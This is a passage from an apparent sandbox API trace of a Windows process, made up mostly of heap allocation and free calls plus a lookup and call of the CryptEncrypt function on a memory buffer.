out: hHeap=0x8a0000) returned 1 [0158.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0158.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0158.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0158.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0158.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0158.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.498] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0158.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0158.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0158.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0158.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0158.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0158.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0158.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0158.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x81f0) returned 0xa05988 [0158.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x81f0) returned 0xa0db80 [0158.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0158.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0158.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa05988 | out: hHeap=0x8a0000) returned 1 [0158.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0158.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa0db80 | out: hHeap=0x8a0000) returned 1 [0158.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.501] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0158.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0158.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0158.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.501] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd750 [0158.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.501] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0158.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0158.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0158.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0158.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa05988 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0158.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x9bd4e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.505] GetProcAddress (hModule=0x74f20000, lpProcName="CryptEncrypt") returned 0x74f4779b [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28b8 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0158.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0158.506] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9fd778*, pdwDataLen=0x87e820*=0x81f0, dwBufLen=0x8200 | out: pbData=0x9fd778*, pdwDataLen=0x87e820*=0x8200) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb28 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0158.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb40 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb28 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0158.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0158.507] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.507] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.507] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.508] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0158.508] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.511] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0158.511] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.511] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.511] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.511] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: 